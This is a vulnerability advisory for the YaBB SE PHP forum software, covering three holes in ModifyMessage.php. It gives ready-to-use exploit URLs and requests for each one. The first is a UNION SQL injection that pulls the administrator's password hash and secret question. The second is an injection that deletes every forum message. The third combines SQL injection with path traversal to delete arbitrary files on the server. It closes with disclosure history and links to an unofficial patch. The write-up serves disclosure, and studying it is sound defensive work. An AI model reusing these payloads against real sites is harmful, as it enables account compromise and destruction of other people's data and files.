Summary YaBB SE is a PHP/MySQL port of the popular forum software YaBB (yet another bulletin board). This time we discovered three new holes. That ranges from extracting information to deleting information and files in the remote web server. Details Vulnerable Systems: * YaBB SE versions 1.5.4, 1.5.5, 1.5.5b possibly others The three holes are located in the file ModifyMessage.php _-= The HOLE =-_ Hole details: Extract information from the database. This hole is located in the ModifyMessage function. In this function the parameter $msg isn't checked against malicious input, so it's possible to inject SQL. How To Exploit the vulnerability: 1- you need to be a registered user and you need to know the database prefix. 2- Click any board you see. ex. General Discussion. 3- Click any message. ex Welcome to YaBB SE! 4- Now we can use the "quote" button or look in to the source code for the sesc variable. 5-change your url to look like this. http://vulnhost/forum/index.php?board=1;action=modify;threadid=1;quote=1;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;msg=-12)+UNION+SELECT+3,null,2,concat(passwd,%27-%27,secretQuestion),null,null,null,null,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/* Parameters explained: http://vulnhost/forum/index.php?board=1;action=modify;threadid=1;quote=1;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;msg=-12[negative number so no message is returned])+UNION+SELECT+3[MSG ID could be anything],null,2[our user ID],concat(passwd,%27-%27,secretQuestion),null,null,null,null,null,null,null ,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1[victim's user ID]/* That's all The user's hashed password and his secret question is returned in the form subject field like this: e320774659b1b23333bd033754d2ac1a-black color Why? the $msg variable isn't checked against malicious input so it's inserted unchecked in the SQL sentence. $request = mysql_query("SELECT m.*, t.locked FROM {$db_prefix}messages AS m, {$db_prefix}topics AS t WHERE (m.ID_MSG=$msg AND m.ID_TOPIC=t.ID_TOPIC) LIMIT 1;") or database_error(__FILE__, __LINE__); with our crafted $msg the sentence looks like this SELECT m.*, t.locked FROM yabbse_messages AS m, yabbse_topics AS t WHERE (m.ID_MSG=-12) UNION SELECT 3,null,2,concat(passwd,'-',secretQuestion),null,null,null,null,1,null,null,n ull,null,null,null,null FROM yabbse_members where ID_MEMBER=1/* AND m.ID_TOPIC=t.ID_TOPIC) LIMIT 1; _-= The HOLE RELOADED =-_ Hole details: Delete information from de database This hole is located in the ModifyMessage2 function. In this function the parameter $postid isn't checked against malicious input, so it's possible to inject SQL. How To Exploit the vulnerability: 1- You need to be a registered user and you need to post the last message. 2- Go to your message and push the modify button 3- Now you have something like this in the URL http://vulnhost/forum/index.php?board=1;action=modify;msg=2;threadid=2;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1 4- Change this action=modify put this action=modify2 and add this 3 new parameters subject=texto, message=texto y waction=deletemodify 5- Add the crafted postid: postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/* now we have: http://vulnhost/forum/index.php?board=1;action=modify2;msg=2;threadid=2;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;subject=hola;message=hola;waction=deletemodify;postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/* this will delete all messages in the database Why? the $postid variable isn't checked against malicious input so it's inserted unchecked in the SQL sentence. $request = mysql_query(" SELECT m.ID_MSG, m.ID_MEMBER, m.attachmentSize, m.attachmentFilename, t.locked, t.ID_FIRST_MSG, t.ID_LAST_MSG, t.ID_TOPIC, t.ID_POLL, t.numReplies, b.ID_BOARD, b.count FROM {$db_prefix}messages AS m, {$db_prefix}topics AS t, {$db_prefix}boards AS b WHERE m.ID_MSG=$postid AND t.ID_TOPIC=m.ID_TOPIC AND b.ID_BOARD=t.ID_BOARD LIMIT 1;" with our crafted $postid the sentence looks like this SELECT m.ID_MSG, m.ID_MEMBER, m.attachmentSize, m.attachmentFilename, t.locked, t.ID_FIRST_MSG, t.ID_LAST_MSG, t.ID_TOPIC, t.ID_POLL, t.numReplies, b.ID_BOARD, b.count FROM yabbse_messages AS m, yabbse_topics AS t, yabbse_boards AS b WHERE m.ID_MSG=1 or 1=1 ORDER BY ID_MSG DESC/* AND t.ID_TOPIC=m.ID_TOPIC AND b.ID_BOARD=t.ID_BOARD LIMIT 1; For this to function we need our messages to be the last because we need our crafted $postid to be injected in two SQL sentences and that the first sentence return valid data to pass this check if ($row['ID_MEMBER'] != $ID_MEMBER && $settings[7] != 'Administrator' && $settings[7] != 'Global Moderator' && !in_array($username, $moderators)) fatal_error($txt[67]); After the first sentence is executed and the check is passed this sentence is executed $request = mysql_query("DELETE FROM {$db_prefix}messages WHERE ID_MSG=$postid LIMIT 1;") wit our crafted $postid we have DELETE FROM yabbse_messages WHERE ID_MSG=2 or 1=1 ORDER BY ID_MSG DESC/* LIMIT 1; this is perfectly legal in MySQL and his consecuence is all messages in the database being deleted _-= The HOLE REVOLUTIONS =-_ Hole details: Delete files from the webserver The third hole is in the same function. This time is a mix of the second bug and the parameter $attachOld being unchecked against dotdot ".." subdirectories traversal . How To Exploit the vulnerability: 1- You need to be a registered user and has to know your user id. 2- Go to one of your messages and use the "modify" button , or go to any message and use the "quote" button. Now you need a tool like Paros or Achilles. You can do another way you want but with this tools is really easy. I use Paros. Check the Trap Request mark. 3- Use preview and go to paros. change this: POST /forum/index.php?board=1;action=post2 HTTP/1.0 to this: POST /forum/index.php?board=1;action=modify2;delAttach=on;attachOld=../../../../d eleteme.txt;subject=hola;message=hola;postid=-1+UNION+SELECT+null,3,null,nul l,null,null,null,null,null,null,null,null/* HTTP/1.0 If you get a database error then the file was deleted else you get a message like this 2: unlink(C:/xampp/htdocs/yabbse/yabbse155/attachments/../../../../deleteme.txt ): No such file or directory (C:\xampp\htdocs\yabbse\yabbse155\Sources\ModifyMessage.php ln 319) Parameters explained: /forum/index.php?board=1;action=modify2;delAttach=on;attachOld=../../../../b orrame.txt[file to delete];subject=hola;message=hola;postid=-1+UNION+SELECT+null,3[Our user ID],null,null,null,null,null,null,null,null,null,null/* Why? Why? the $postid variable isn't checked against malicious input so it's inserted unchecked in the SQL sentence. $request = mysql_query(" SELECT m.ID_MSG, m.ID_MEMBER, m.attachmentSize, m.attachmentFilename, t.locked, t.ID_FIRST_MSG, t.ID_LAST_MSG, t.ID_TOPIC, t.ID_POLL, t.numReplies, b.ID_BOARD, b.count FROM {$db_prefix}messages AS m, {$db_prefix}topics AS t, {$db_prefix}boards AS b WHERE m.ID_MSG=$postid AND t.ID_TOPIC=m.ID_TOPIC AND b.ID_BOARD=t.ID_BOARD LIMIT 1;" the sentence with our crafted $postid looks like this: SELECT m.ID_MSG, m.ID_MEMBER, m.attachmentSize, m.attachmentFilename, t.locked, t.ID_FIRST_MSG, t.ID_LAST_MSG, t.ID_TOPIC, t.ID_POLL, t.numReplies, b.ID_BOARD, b.count FROM yabbse_messages AS m, yabbse_topics AS t, yabbse_boards AS b WHERE m.ID_MSG=-1 UNION SELECT null,3,null,null,null,null,null,null,null,null,null,null /* AND t.ID_TOPIC=m.ID_TOPIC AND b.ID_BOARD=t.ID_BOARD LIMIT 1; m.ID_MSG=-1 is to avoid returned data. And UNION SELECT null,3,null,null,null,null,null,null,null,null,null,null is a perfectly legal MySql UNION returning static data the way we want. Vendor Status: As in the last bug we sent to YaBBSe developers they didn't anything in a month to solve this situation and later they release a one line patch several days after we disclose that vulnerability, and because we don't like their policy of security through obscurity. We decided not to collaborate with them anymore and release our own patch, You can download the patch at: http://www.elhacker.net/foro/attachments/yabbse1.5.5patch.rar http://www.trucoswindows.net/Dowmload/yabbse1.5.5patch.rar Credits go to: Alnitak and BackSpace
